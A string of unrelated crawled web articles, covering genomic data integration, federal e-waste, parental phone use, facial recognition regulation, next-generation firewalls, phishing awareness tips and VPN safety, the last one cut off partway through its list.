The true value of genomic sequencing comes from cross-referencing such data with the abundance of external resources dedicated to genetic information, pharmaceuticals and healthcare conditions. “A lot of this data is available in public sources,” Biotricity’s Al-Siddiq said. “You’ve got information from multiple people and databases that study a very specific disease so you know which mutation to go after.” Most of that semi-structured or unstructured data was created with varying data models, formats and taxonomies, which make integration with traditional relational techniques cumbersome and time-consuming.
A more practical approach is to “do a semantic integration that translates all those different databases into an ontological form of knowledge representation, one that’s really just about the biology,” Hunter said. “So now you can query this knowledgebase without having to know which database the information came from or how that database is organized or any of that. All you have to know about is the biology.”
One of the innate benefits of such an approach is that by linking data on an RDF graph with common ontological models, users can accommodate the evolving nature of biological informatics. New developments related to genomic data, characteristics, mutations and more are readily encompassed within the underlying semantic technologies linking what were initially disparate data types. That methodology facilitates both semantic and logical consistency for representing facets of genomic research that may one day change or, perhaps more commonly, become disputed. | <urn:uuid:e0e202a5-e719-48d1-9e19-b976b95c1b59> | CC-MAIN-2022-40 | https://www.kmworld.com/Articles/Editorial/Features/Shaping-healthcares-future-with-genomic-data-120390.aspx?pageNum=2 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00794.warc.gz | en | 0.949082 | 981 | 2.953125 | 3 |
How much e-waste does the U.S. government generate? According to General Services Administration (GSA) head Martha Johnson, “By some estimates, the federal government goes through 10,000 computers a week.”
And that’s not the only staggering statistic in this Washington Post/Bloomberg article that examines the steps the GSA and EPA are taking to combat e-waste and boost a U.S. recycling industry that currently employs 30,000 workers and generates $5 billion in revenue each year. This entails the adoption of a third party certification standard that would dictate how the federal government recycles its IT equipment — paving the way for industry at large to follow suit.
The two front runners are E-Stewards (notable for banning the export of e-waste to developing regions) and the business-friendlier Responsible Recycling or R2 certs. For now, be sure to keep an eye on this fight as it could very well end up influencing your business’ IT procurement and recycling policies.
Update: Below you’ll find links to more info on the certs mentioned in this post.
Image courtesy of Ulises Jorge, Flickr – CC | <urn:uuid:ef783650-c189-477c-aa70-ff60c4e47fa4> | CC-MAIN-2022-40 | https://www.ecoinsite.com/2011/09/ewaste-federal-government-disposes-10000-computers-per-week.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337631.84/warc/CC-MAIN-20221005140739-20221005170739-00794.warc.gz | en | 0.932416 | 253 | 2.546875 | 3 |
Parents who spend a lot of time on their phones or watching television during family activities such as meals, playtime, and bedtime could influence their long-term relationships with their children.
This is according to Brandon T. McDaniel of Illinois State University and Jenny S. Radesky of the University of Michigan Medical School, both in the US, who say so called “technoference” can lead children to show more frustration, hyperactivity, whining, sulking or tantrums.
The study in the journal Pediatric Research, which is published by Springer Nature, examines the role and impact digital devices play in parenting and child behavior.
Technoference is defined as everyday interruptions in face-to-face interactions because of technology devices.
Recent studies estimate that parents use television, computers, tablets and smartphones for nine hours per day on average.
A third of this time is spent on smartphones, which due to their portability are often used during family activities such as meals, playtime, and bedtime — all important times involved in shaping a child’s social-emotional wellbeing.
When parents are on their devices research shows that they have fewer conversations with their children and are more hostile when their offspring try to get their attention.
In this study, 172 two-parent families (total of 337 parents) with a child age 5 years or younger answered online questionnaires as part of a research project about parenting and family relationships conducted between 2014 and 2016.
Participants indicated how often per day different devices interrupted their conversations or activities with their children.
Parents rated their child’s internalizing behavior such as how often they sulked or how easily their feelings were hurt, as well as their externalizing behavior, such as how angry or easily frustrated they were.
The parents also reported on their own levels of stress and depression, the coparenting support they received from their partners, and their child’s screen media use.
In almost all cases, one device or more intruded in parent-child interactions at some stage during the day.
Technology may serve as a refuge for parents who have to cope with difficult child behavior. However, the survey results showed that this tactic had its drawbacks.
Electronic device use likely deprives parents of the opportunity to provide meaningful emotional support and positive feedback to their children which causes their offspring to revert to even more problematic behaviour such as throwing tantrums or sulking.
This only added to parents’ stress levels, likely leading to more withdrawal with technology, and the cycle continues.
“These results support the idea that relationships between parent technoference and child externalizing behavior are transactional and influence each other over time,” says McDaniel.
“In other words, parents who have children with more externalizing problems become more stressed, which may lead to their greater withdrawal with technology, which in turn may contribute to more child externalizing problems.”
“Children may be more likely to act out over time in response to technoference as opposed to internalize,” adds Radesky, for whom the findings corroborate mealtime observations of how a child’s bad behavior often escalates in an effort to get the attention of their parents using mobile devices.
- Brandon T. McDaniel, Jenny S. Radesky. Technoference: longitudinal associations between parent technology use, parenting stress, and child behavior problems. Pediatric Research, 2018; DOI: 10.1038/s41390-018-0052-6 | <urn:uuid:babe915e-f183-4a83-90d8-d611bc3d70ee> | CC-MAIN-2022-40 | https://debuglies.com/2018/06/14/research-shows-that-parents-who-use-their-smartphone-to-escape-the-stress-of-their-childs-bad-behavior-may-be-making-it-worse/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00194.warc.gz | en | 0.970301 | 730 | 3.265625 | 3 |
Facial recognition technology has been fodder for crummy science fiction movies and techno-thriller novels for decades, but in the last couple years it has been woven into many facets of real life. Schools, shopping malls, concert venues, and law enforcement agencies all use facial recognition systems for various applications, some of which have become quite controversial. One of the world’s largest tech companies is now asking the federal government to step in and provide a regulatory framework for law enforcement and others who use the technology.
Microsoft President Brad Smith, whose company provides facial recognition technology to private companies and government agencies, said in a blog post that he has come to the conclusion that Congress needs to step in and regulate the ways in which organizations deploy the technology and use the data they collect. Smith said the technology has advanced to a point that it’s accurate enough for many applications, but the privacy and security thinking around it hasn’t kept pace.
“We believe Congress should create a bipartisan expert commission to assess the best way to regulate the use of facial recognition technology in the United States. This should build on recent work by academics and in the public and private sectors to assess these issues and to develop clearer ethical principles for this technology. The purpose of such a commission should include advice to Congress on what types of new laws and regulations are needed, as well as stronger practices to ensure proper congressional oversight of this technology across the executive branch,” Smith wrote.
Silicon Valley has had a complicated relationship with Congress and federal regulators for a long time, and large technology companies aren’t usually eager for more oversight or regulation of their businesses. But the use of facial recognition at the U.S. border and questions about biases and inaccuracies in the technology have contributed to a change in thinking in some parts of the tech industry. Last month, a group of Amazon employees sent a letter to Jeff Bezos, the company’s founder and CEO, asking him to stop selling Amazon’s facial recognition software to government and law enforcement agencies. Smith said the current political and social climate make regulation of this technology even more important, for both consumers and the organizations that deploy it.
“It seems especially important to pursue thoughtful government regulation of facial recognition technology, given its broad societal ramifications and potential for abuse. Without a thoughtful approach, public authorities may rely on flawed or biased technological approaches to decide who to track, investigate or even arrest for a crime,” Smith said.
“Governments may monitor the exercise of political and other public activities in ways that conflict with longstanding expectations in democratic societies, chilling citizens’ willingness to turn out for political events and undermining our core freedoms of assembly and expression. Similarly, companies may use facial recognition to make decisions without human intervention that affect our eligibility for credit, jobs or purchases. All these scenarios raise important questions of privacy, free speech, freedom of association and even life and liberty.”
“It seems especially important to pursue thoughtful government regulation of facial recognition technology, given its broad societal ramifications and potential for abuse."
The recent spread of facial recognition technology has raised a number of privacy and security concerns. Pervasive surveillance in public spaces is a reality in many parts of the U.S., and privacy advocates worry that combining video surveillance with facial recognition gives private companies and law enforcement the ability to track individuals through their daily lives without their knowledge.
“Congress should take immediate action to put the brakes on this technology with a moratorium on its use by government, given that it has not been fully debated and its use has never been explicitly authorized. And companies like Microsoft, Amazon, and others should be heeding the calls from the public, employees, and shareholders to stop selling face surveillance technology to governments,” said Neema Singh Guliani, legislative counsel at the American Civil Liberties Union.
In his post, Microsoft’s Smith laid out a number of questions that a potential congressional committee should consider, including whether law enforcement use of facial recognition should require human oversight, what laws can prevent the use of the technology for racial profiling, and whether the use of facial recognition be subject to minimum levels of accuracy. | <urn:uuid:fec580ea-ec5f-4481-95e9-446447efcfd2> | CC-MAIN-2022-40 | https://duo.com/decipher/microsoft-wants-federal-regulation-of-facial-recognition-technology | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00194.warc.gz | en | 0.948701 | 847 | 2.578125 | 3 |
At its core, a firewall is a network security system, either hardware- or software-based, that controls incoming and outgoing network traffic based on a set of rules.
We all know that there are many things a traditional firewall can do really well. For example:
- Blocks ports
- Allow outbound traffic
- Network address translation
On the other hand, there are many things a traditional firewall simply can’t do so well:
- Application firewall
- Intrusion prevention system
- SSL and SSH inspection
- Deep-packet inspection
- Application awareness – OSI Layer 4-7 attack mitigation
For the latter features and protection, a Next Generation Firewall (NGFW) is needed to provide more thorough edge security. Let’s talk about some of those features.
Application firewall, also known as a Web Application Firewall (WAF), is designed to help protect HTTP traffic. Common attacks are cross-site scripting (XSS) and SQL injection.
Intrusion Prevention System
“Intrusion detection is the process of monitoring the events occurring in a computer system or network and analyzing them for signs of possible incidents…Intrusion Prevention System (IPS) is the process of performing intrusion detection and attempting to stop detected possible incidents. “ (NIST) IPS looks for bad activity on the network, both human and malware, to help prevent exploitation of weaknesses on the network or device.
SSL and SSH Inspection
A common malware strategy is to create a secure, out-bound connection to a command and control network in order to download their payload and become harmful. Leveraging Next Generation Firewall SSL inspection, the firewall is able to identify and block that outbound request rendering the infection toothless. Additionally, most traffic to common sites such as banks, Facebook, Google, Reddit, and Twitter enforce HTTPS connections (SSL) by default.
This traffic would not be able to be monitored through traditional firewalls. Common proxy services used to thwart conventional URL filtering also establishes a secure connection by default.
Being able to inspect this traffic at the firewall ensures compliance with corporate policy and helps protect from the exfiltration of data.
Anti-Malware adds a layer of protection at the edge to remediate known threats. Some firewalls communicate with a global threat center for rapid signatures. Others leverage third-party OEM software running within the appliance.
This is not designed to take the place of endpoint protection but augment it. It will not see issues originating from USB devices for example.
Application awareness is looking at the traffic and understanding what applications are generating it. This not only examines what the traffic is but looks for abnormalities and the way the application is working to see if the traffic generated is valid.
A basic example would be a Microsoft Word document making an HTTPS call to an outside server. In most cases, your document isn’t meant to act in this manner and would be blocked by the firewall.
The culmination and enablement of these features are what provide more complete protection at the edge over existing, and previous generation, firewalls. But as mentioned, firewalls alone are not complete protection but work in conjunction with a multi-layered strategy. If you’re looking to move your organization towards a more secure future, it’s time to start consider next-generation firewall technology.
Is your organization secured?
Having an intelligent security strategy is more important than ever. Our experts can help. | <urn:uuid:cd5ea71b-28b5-4c36-833f-a13d2b799b12> | CC-MAIN-2022-40 | https://microage.com/blog/i-have-a-firewall-i-am-protected/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00194.warc.gz | en | 0.916248 | 742 | 3.078125 | 3 |
According to a leading IT firm research nearly 90 percent of the data in the world has been produced in just the last two years. Though a bit of a buzz phrase these days, big data is as important as the internet itself to many businesses today, for a number of reasons. The simplest explanation of how big data benefits businesses is this: It provides the insights needed to make more confident decisions, take faster actions, improve operational efficiencies, minimize risks, and reduce spending.
The sudden emergence of the whole phenomenon around the data explosion has been the result of the pervasive use of mobile devices and the large volumes of data generated from web based purchases, mobile activities, and social media interactions. As the massive volume of data and computing platforms continues to proliferate, the absence of thorough reassessments and thinking around information processing paradigms of the past will leave today’s enterprises ill-prepared to deal with this new (IT) normal.
Enterprises have to realize the obvious fact that big data is an immensely powerful concept, and information is a strong business asset. Managing large volumes of homogenous data is something that organizations of all kinds can benefit from; spanning retail, social networking, science and research, clinical trials, CRM, operational activities, transactions and more. The real challenge for organizations today is to move beyond the data volumes and data storage obstacles to assess the true value of available data to reduce overall internal audit or compliance field work costs. The vast majority of enterprise businesses are faced with the challenge of decoding large volumes of homogenous, inconsistent, or inaccurate data — often referred to as “bad data.”
Industry analyst Doug Laney encapsulated the characteristics of big data using the three Vs — volume (the quantity of data), velocity (the rate at which data is generated and changed) and variety (the number of different data sources and types). Many are also adding characteristics such as “complexity,” “veracity” and “variability” to their understanding of the concept.
An accurate analysis of big data helps enterprises with better insights into their customers, market opportunities, growth prospects, and corporate performance. This strategic analysis of large volumes of data enables organizations to achieve higher-quality results in their own internal audit and compliance processes, thus enabling them to establish more effective governance, controls, and monitoring mechanisms.
With the skyrocketing number of transactions and evolving compliance requirements and regulations, big data analysis offers endless opportunities for enterprises to mitigate key governance, risk, and compliance issues. Just as big data analytics can lead to more targeted marketing initiatives by analyzing marketing program responses, supplier activities, customer demographics, and sales patterns, effective analysis of massive volumes of structured and unstructured data can also enable organizations in the Governance, Risk and Compliance (GRC) space to:
- Develop strong risk intelligence to strengthen risk management and streamline regulatory compliance
- Identify high-risk vendors/persons with multiple fraud risk indicators in accounts payable
- Display travel and entertainment expenses of local office employees
- Identify the best practices in the industry to effectively mitigate risks
- Determine if control procedures are working effectively
Big data analysis should become a core component of every organization’s operations, performed on a continuous basis, spanning areas such as payment or billing transactions, payroll, social media analysis, sales, operational processes, and compliance. For many organizations, especially in highly scrutinized and regulated industries such as healthcare, finance, and insurance, big data analysis can support Enterprise Risk Management (ERM) by helping monitor risks involving loans, claims, and patient care procedures.
Simply stated, integrating big data analytics into an organization’s GRC methodology will help pave the way for a truly data-driven organization. | <urn:uuid:e714d12a-c048-45cf-a1ef-14bb2f14d3cd> | CC-MAIN-2022-40 | https://www.metricstream.com/blog/governance-risk-compliance-and-big-data-advantage | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00194.warc.gz | en | 0.925464 | 766 | 2.5625 | 3 |
The goal of Technology is Success, but that success is for whom? The answer to this question can be a good starting point for a Responsible AI vision, developing which is still the responsibility of human intelligence.
Artificial Intelligence has produced many useful tools and devices for human use. Looking at AI as an increment in the continuous improvement cycle of computer science unlocks amazing opportunities for the future.
There are close to 1 billion people (15% of the global population) on earth who suffer some form of disability. And according to UN reports, in 2019, there were close to 703 million persons aged 65 or over in the world. Providing a few accessibility/disability features on their smartphones/devices is not enough. These billion and a half plus people are looking at AI efforts of the ‘able’ human minds with great hope and some of the applications of AI in the areas of expert systems, natural language processing, speech recognition, and machine vision, etc., still have a lot to do on their part.
AI is the product of the advancement in computer science, not its representative and like any other tech product, its usefulness for humanity needs to be checked and re-checked repeatedly, with an unbiased approach.
Current trends in AI development centered on four major themes: Internet, Business, Perception, and Autonomous Systems. And these trends produce some interesting headlines too, such as AI is beating Human players (in strategic maneuvers), AI is surpassing human doctors, solving decades-old biological research challenges, or producing the Humanoid capable of displacing us from our jobs and routine functions, etc. At the same time, there can be different perspectives to read these trends, which are often shaped by according to our worldview and socio-economic culture.
It is interesting to note that the global AI efforts were going on at their own pace till China had not entered the court, its entry into AI Game (more aggressively from July 2017) has changed the course of these efforts.
How China spoiled the GAME
If China would have not taken Alpha GO’s win over Chinese Go Champion Ke Jie so personally, the world would be at more peace with the AI! According to Dr. Kai Fu Lee, CEO of Sinovation Ventures and author of “AI Superpower” book, the AlphaGo victory “lit a fire under the Chinese technology community that has been burning ever since.” And he also writes that “when Chinese investors, entrepreneurs, and government officials all focus in on one industry, they can truly shake the world.” From 2017, China has accelerated the pace of AI investment and R&D activities on a historic scale. It is interesting to note that in less than two months of Ke Jie’s defeat from Alpha Go, the State Council of China launched the vision “A Next-Generation Artificial Intelligence Development Plan.” It describes AI as a “strategic technology” that has become a “focus of international competition” and projected that “by 2030 China would become the center of global innovation in artificial intelligence, leading in theory, technology, and application.”
The entry of this new aggressive player in the AI Game persuaded the other players to rethink/revise their approach. One can say that similar to defense and manufacturing supply chains China spoiled the spirit of healthy competition in this domain too. Since 2017, both leading players of this race, the USA and China, have adopted a different kind of tone and their approach often reflects desperation to prove something that is yet to happen.
Both sides often tend to prematurely announce the outcomes of their experiments and technological investigations, such claims create an undesirable hype which in turn is harming the potential of this useful invention.
Responsible AI – Different Versions
Today, Responsible AI is the latest buzzword in the industry, and all major tech companies have aligned their corporate strategy and vision to capture its spirit. A typical responsible AI corporate vision includes the elements of fairness, reliability, safety, privacy/security, inclusiveness, transparency, and accountability. And to deal with the potential AI risks, some big tech companies have now started advocating for a Human-Centered Design Approach too.
Several governments and intergovernmental organizations have laid out their Responsible AI policy initiatives and ethics guidelines as well. In 2017, the European Council called for a “sense of urgency to address emerging trends,” and earlier this year, it advocated for freedom and human rights in its recently proposed AI regulations, which explicitly says “AI should be a tool for people and be a force for good in society with the ultimate aim of increasing human well-being.”
Last year, Nature (an international science journal) published a study titled “The role of artificial intelligence in achieving the Sustainable Development Goals,” which highlighted that “AI can actively hinder 35% of UN SDG targets (59 out 169)” and it also stated that AI requires “massive computational capacity, which means more power-hungry data centers and a big carbon footprint.”
In June 2020, India became one of the founding members of OECD’s multi-stakeholder initiative – Global Partnership for Artificial Intelligence (GPAI), which has the goal of “guiding the responsible development of the AI, grounded in human rights, inclusion, diversity, innovation, and economic growth.”
These discussions around making AI more responsible also highlight the silent acknowledgment of the fact that somewhere this tech innovation was not designed by keeping the elements of responsibility and accountability toward humanity in mind.
This new kind of urgency around AI’s responsibility issue raises some important questions related to the lack of leadership in global AI efforts too! It is important here to note that all these global forums bet on India, for presenting a template of Responsible AI for the world.
The Indian Version
The story of Transforming India is a story of responsible use of digital technology too. In India’s Reform, Perform and Transform trajectory, digital technologies have played a significant part. With 130 crore Unique Identity numbers, 118 crore mobile subscribers, 80 crore internet users, and approx 43 crore Jan Dhan bank accounts, today India has the world’s biggest connected infrastructure and this infra is India’s key force in the fight against the corona pandemic too.
The difference in the approach of India and the West, on the questions of Responsibility reflects in their approach toward AI too.
In his 76th UNGA address, Prime Minister Narendra Modi talked about Pandit Deendayal Upadhyay’s Integral Humanism and he said “Integral Humanism is the co journey of development and expansion from self to the collective that is – expansion of the self, moving from individual to the society, the nation, and entire humanity.” Pandit Deendayal Upadhyay was of the belief that any system which obstructs the production activity of the people is self-destructive. He often used to say that “Man has stomach as well as hands. If he has no work for his hands, he will not get happiness even if he gets food to satisfy his hunger. His progress will be obstructed.”
This clarity guides the Responsible AI mission of India too. And it is this integrated viewpoint that makes India’s Responsible AI vision unique, practical, and more aligned with the key UN Sustainable Development Goals.
In 2018, NITI Aayog published the National Strategy for Artificial Intelligence, which identifies five core areas for the application of artificial intelligence: Healthcare, Agriculture, Education, Smart Cities, and Infrastructure, Smart Mobility, and Transportation. Prime Minister’s Science, Technology, and Innovation Advisory Council (PM-STIC) also launched a dedicated mission for Artificial Intelligence for enhancing the industry-academia interactions related to core research capability at the national and international level.
India believes that AI is a tribute to human intelligence and “the teamwork of AI with humans can do wonders for our planet,” as PM Modi rightly said at the RAISE (Responsible AI for Social Empowerment) 2020 summit.
When we minus the responsibility from technological innovation, we open up the gates for its weaponization. Are the benefits of Biotech research and experimentation are (in any way) lesser than Artificial Intelligence? In the continuing waves of the Corona pandemic, hidden a lesson for humanity.
‘Spiderman Ethics’ and dialogues like “with great power, comes great responsibility” have dominated the product/technology designs for decades, and we have seen their limitations too. To move forward from this point and for more clarity on ethical issues, a different kind of philosophy, mindset, and approach will be needed, and this is where India has a larger role to play! | <urn:uuid:9dcfc1f3-b877-4739-bf66-89d3a05de459> | CC-MAIN-2022-40 | https://www.dailyhostnews.com/responsible-ai-and-india | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335058.80/warc/CC-MAIN-20220927194248-20220927224248-00194.warc.gz | en | 0.954269 | 1,812 | 2.609375 | 3 |
Google’s Quantum Artificial Intelligence Lab, in partnership with scientists from several institutes in California, has launched its hardware initiative to design and build new quantum information processors based on superconducting electronics.
An alliance between Google, NASA Ames Research Center and the Universities Space Research Association (USRA), the Quantum Artificial Intelligence Lab explores quantum optimization as related to artificial intelligence.
A post on their research blog on Tuesday points out, “With an integrated hardware group the Quantum AI team will now be able to implement and test new designs for quantum optimization and inference processors based on recent theoretical insights as well as our learnings from the D-Wave quantum annealing architecture.”
Joining the Google team will be John Martinis and his research group at University of California Santa Barbara which has made recent advancements in building superconducting quantum electronic components of very high fidelity.
Google has been indulged in artificial intelligence for a while now, and Quantum computing is a sure step forward in this endeavour; the problem however lies in the absence of requisite hardware to make quantum computing possible.
Read more here.
(Image credit: Mark Knoll) | <urn:uuid:f104900f-087b-4411-a197-0cb6765cd80a> | CC-MAIN-2022-40 | https://dataconomy.com/2014/09/google-sets-quantum-computing-hardware-in-its-crosshairs/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337398.52/warc/CC-MAIN-20221003035124-20221003065124-00194.warc.gz | en | 0.923917 | 232 | 2.96875 | 3 |
You’ve likely already been the target of a neighbor spoofing call — you just might not know it. This clever little trick has been on the rise since early 2016.
What Is Neighbor Spoofing?
Neighbor spoofing is the method of masking a phone number with a local area code so victims will believe they recognize (or should recognize) the number and feel safer in picking up the call. Scammers use this technique, also known as “spoofing,” to prey on unsuspecting victims. Once these bad actors have your customers on the line, they’ll start in on their same, old, and tired attempts to trick them out of their hard-earned dollars.
This is a strategic shift in traditional spoofing. In classic spoofing, a scammer will copy the first 5 or 6 digits of a company’s phone number with the hope of successfully posing as a local business. This change in strategy suggests that spam blocking providers like Hiya are successfully predicting neighbor scam calls. In response to effective anti-spam solutions, the scammers have attempted to continue the scam by switching to a less targeted strategy; by generalizing their approach, scammers hope they can go undetected and, therefore, keep the scam viable. Unfortunately, the scammers are right—predicting if a call is a neighbor spoof is much harder with 3 digits, as opposed to the traditional 6—but Hiya is up for the challenge.
Hiya has aggregated and anonymized data to create algorithms that effectively, and efficiently, identify area code-based neighbor scams. Our model instantly recognizes if the number in question belongs to a scammer and blocks calls (or marks them as spam) to protect consumers. Conversely, the model also identifies calls from legitimate businesses and ensures that calls from that number aren't mistakenly flagged as spam.
It’s not just consumers—and Hiya—that recognize neighbor spoofing as a problem. The Federal Trade Commission (FTC) is also aware and has made steps to resolve it. In 2019, they began a major crackdown on robocalls and spoofing through a variety of regulations, which led to a major decline in neighbor spoofing. Although it is impossible to completely stop phone spoofing, the decline shows that the FTC’s regulations initially made a substantial impact. However, in the last year, the number of neighbor calls have begun to rebound and even surpass their initial peak since the initial crackdown, as scammers have found ways around the new regulations, indicating that there is still lots of work to be done.
How to Stop Neighbor Spoofing
Although it is difficult to completely block neighbor spoofing and prevent your company’s phone numbers from being spoofed, there are a few steps you can take to minimize risk for your company.
- Find a secure voice performance platform that provides visibility and control over any of your numbers that have been spoofed.
- Display a branded caller ID to consumers to give them the confidence to answer calls from you.
- Get a free reputation analysis report from Hiya to see if any of your numbers are being spoofed.
Hiya’s network is 170 million users strong, due in part to strategic partnerships with AT&T, Samsung, Cricket Wireless, and other national providers. Hiya allows you to see how many times your number has been spoofed on our network, so you can make sure that your customers won’t fall victim to neighbor spoofing.
If you make more than 20,000 calls a month, see if any of your call center numbers have received negative (spam!) labels with a free Hiya Connect reputation analysis. Get additional information on how to stop your numbers from being spoofed with our How to Stop Spoofing eBook. | <urn:uuid:8d5f2aa6-ecaf-4b4a-87d1-d1131dcebf3e> | CC-MAIN-2022-40 | https://blog.hiya.com/the-evolution-of-the-neighbor-scam | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334515.14/warc/CC-MAIN-20220925070216-20220925100216-00394.warc.gz | en | 0.961877 | 778 | 2.71875 | 3 |
Phishing, a form of social engineering, is the most prevalent and persuasive attack vector used to steal confidential data, account passwords, credit card numbers and more.
We'll explore the various phishing forms, its devastating effects and actionable guidance to improve your team's cyber defenses in today's post.
Cybercriminals often masquerade themselves as a trusted source during a phishing scam to trick a victim into clicking on a malicious URL or downloading an attachment by conveying urgency in their messaging. Ultimately, this leads to compromised systems, data leaks, reputational damage and other calamitous outcomes.
Phishing is not only profoundly common, but it’s arguably the most destructive and high-profile cybersecurity threat facing organizations today.
- The 2020 Verizon Data Breach Investigations Report (DBIR) reported that internal actors caused 32% of data breaches, aka employees, for some industries.
- The same DBIR study found that phishing attacks continue to dupe users. Further, employee error, such as not implementing access controls on databases, leads to increased vulnerabilities and data leaks.
- Phishing emails are the #1 delivery vehicle for ransomware.
- Symantec 2019 Internet Security Threat Report (ISTR) found that formjacking attacks compromise 4,800 websites each month.
- Last year, the FBI received 467,361 internet crime complaints, which it estimates resulted in over $3.5 billion in losses, per the agency's 2019 Internet Crime Report.
- From C-level executives to individual contributors, anyone who opens an unknown email and trusts its content is vulnerable to this manipulation tactic.
Researchers at Symantec proposed that nearly one in every 2,000 of those emails is a phishing scam, implying that roughly 135 million phishing attacks are attempted daily. Most people don't have the time to scrutinize every message that lands in their inbox carefully, and that's precisely what phishers are hoping to exploit.
Let's examine some of the most common email scams:
Business Email Compromise (BEC)
- Various forms of lucrative BEC attacks enable threat actors to breach business email accounts more efficiently and rapidly. One method is CEO fraud, where an attacker has successfully compromised the CEO’s inbox and can send out emails from the legitimate email address. Another scenario involves a fake address that spoofs the CEO's email.
- Whaling demands a concerted effort; however, the high return level makes whaling attractive to scammers. Whaling attacks targets senior-level executive in an effort to capture sensitive information through the use of sophisticated, personalized language.
- Cybercriminals duplicate a legitimate email in a clone phishing attack and then incorporate nefarious links or attachments into the updated version while mirroring the original sender's information.
- A highly targeted attack personalized to the individual victim by addressing the person by their name or title. In a spear-phishing scam, hackers pretend to be CEOs, CFOs, or department leads and contact a specific group of employees, such as assistants. These messages appear urgent and use persuasive writing to ask the respondent to send highly confidential files or critical business information.
Mobile PhishingIn today’s connected world, scammers have shifted their focus towards smartphones as ideal attack vehicles. Examples of mobile phishing attacks include:
- Vishing is a subset of mobile phishing, whereas criminals typically use a spoofed ID to make a phone call, so it appears it's from a trustworthy source.
- During a smishing scam, attackers send an SMS message containing links to phishing web pages or applications that ask for credentials if visited. If you haven't yet, check out our article "Scam Alert: Criminals Cloning Hedge Fund Websites" to learn more about phishing websites.
- Attacks can also be initiated via email messages loaded in the browser of mobile devices. Unbeknownst to unsuspecting users, they download forged applications loaded with malware, and then crooks actively capture personal information and trick users into divulging passwords.
Tips to Avoid Phishing Scams
Social engineering is a psychological tool that takes advantage of patterns of human behavior. To help you outwit a cybercriminal, consider the following list of practical guidance:
- Stay informed about phishing techniques to mitigate the risk of getting snared. New phishing scams are emerging daily, so to avoid falling into a hacker's trap, consider staying abreast of the latest attack vectors.
- Look out for spelling and grammatical errors — frequent mistakes spotted in phishing communications. If you come across poor grammar in an email, there is a high probability it did not come from the official organization it is claiming to be.
- Speak with a Cybersecurity and Risk Management Specialist. Discover potential solutions for your organization, and learn about the differences between traditional and next-generation Cybersecurity Services.
- Do not click on links, download files, or open attachments in emails from unknown senders. It is best to open attachments only when you are expecting them, are certain the sender is credible and are confident in the message's content. Additionally, make sure you check the URL's legitimacy by hovering first, and if it seems even remotely questionable, don’t click on it.
- Never email personal or financial information, even if you are close to the recipient. You never know who may gain access to your email account or the person’s account to whom you are emailing.
- Be vigilant and avoid clicking on links to accept a prize you won for a competition you didn't participate in. Freebies and complimentary swag are attractive, so bad actors frequently use these ploys to trick people.
- Keep your browser updated. Security patches are routinely released for popular browsers in response to the security loopholes that phishers and other hackers exploit. If you habitually ignore messages about updating your browser, put a stop to that habit.
- Smartphone security best practices go a long way. To protect yourself, business accounts and personal information, always read app reviews before initiating downloads, keep smartphone security settings strict and consider adopting a reliable mobile security solution immediately.
Align Cybersecurity Services offer tailored, elegant and advanced cybersecurity solutions, encompassing Vulnerability Assessments / Penetration Testing, Cybersecurity Risk Management as a Service (Align Risk CSR), Customized Cybersecurity Programs, Third Party Management, Managed Threat Protection (Align Guardian), Cybersecurity Training and more.
This article has been updated and was originally written in 2018. | <urn:uuid:f6230885-4ff8-4e8b-ad8a-9a51cb390d1b> | CC-MAIN-2022-40 | https://www.align.com/blog/common-phishing-attack-methods-and-tips-to-avoid-scams | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334515.14/warc/CC-MAIN-20220925070216-20220925100216-00394.warc.gz | en | 0.920267 | 1,361 | 2.625 | 3 |
How Secure is a VPN?
Using a reliable virtual private network (VPN) can be a safe way to browse the internet. VPN security can protect from IP and encrypt internet history and is increasingly being used to prevent snooping on by government agencies. However, VPNs won't be able to keep you safe in all scenarios.
If you are asking what is VPN, it is a virtual network that enables an internet user to protect themselves and their organization by creating a private web browsing session. This is especially important when using public Wi-Fi to prevent other people from eavesdropping on the user’s online activity and the data and information they share. A VPN creates a secure tunnel between a user’s computer and the VPN server, which hides their online activity and location.
VPN security enables users to protect their online privacy and prevent their internet service provider (ISP) from tracking their browsing activity. It works by connecting a user’s device to the VPN server, then passing their internet traffic through the VPN provider’s internet connection. This hides browsing information and makes it more difficult for bad actors to gather or monitor the user’s online activity.
Is Private Browsing Really Private?
You might be asking yourself. "Do I really need a VPN when my browser has private browsing?"
Popular web browsers include a feature called private browsing, which enables users to browse the web without saving their history, search information, and temporary local data like cookies. Private browsing is available through top browsers, such as Apple Safari on Mac and iOS, Google Chrome’s Incognito mode, Mozilla Firefox, Opera, and Microsoft Edge’s InPrivate Browsing.
A browser's private browsing mode will prevent data from being stored on a user’s local device or computer. However, it does not necessarily prevent information from being shared between the user’s device or computer and their ISP. Furthermore, third parties may be able to detect users’ activity through private browsing sessions, which they can use to exploit their operating system.
5 Reasons Why Free VPNs Are Not Safe
"Is VPN safe?" is a question everyone should be asking, and the answer is straightforward. Using free software is not an effective solution for ensuring VPN security because it often will not protect data and browsing activity on the internet. Key reasons not to use a free VPN include:
- Free VPN tools compromise user security: Many free VPN tools contain malware that could be used by cyber criminals to steal users’ data, gain unauthorized access to their data or machine, or launch a cyberattack. Research report from the ICSI Networking and Security Group found that 38% of the 283 Android VPN apps studied contained some form of malware presence. Therefore, a VPN application may not always be safe when using free tools.
- Free VPN tools track online activity: A secure VPN should protect a user’s activity while they browse the internet, but some free VPNs do the opposite by tracking users’ online activity. The same ICSI research found that 72% of the free VPN services analyzed embedded third-party tracking tools in their software. This enables VPN tools to collect user information and sell it for a profit to the highest bidders, which allows advertisers to target free VPN users with ads. Some free VPN tools hide information about whether they share or sell user data, but others say so in their privacy policies.
